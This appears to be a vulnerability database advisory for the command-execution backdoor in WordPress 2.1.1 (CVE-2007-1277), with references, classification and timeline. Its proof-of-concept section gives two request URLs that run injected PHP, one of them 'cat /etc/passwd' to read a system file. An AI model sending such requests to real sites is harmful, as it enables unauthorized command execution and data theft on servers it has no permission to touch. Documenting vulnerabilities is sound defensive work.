WordPress 2.1.1 - Command Execution Backdoor



Proof of Concept
http://www.example.com/wp-includes/feed.php?ix=phpinfo();
http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd

Affects WordPress

fixed in version 2.1.2

References

CVE 2007-1277
SECURITYFOCUS 22797
URL https://exchange.xforce.ibmcloud.com/vulnerabilities/32807
URL http://wordpress.org/news/2007/03/upgrade-212/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Views 4176
Verified No
WPVDB ID 6028

Timeline

Publicly Published 2014-08-01 (about 5 years ago)
Added 2014-08-01 (about 5 years ago)
Last Updated 2018-08-29 (about 1 year ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin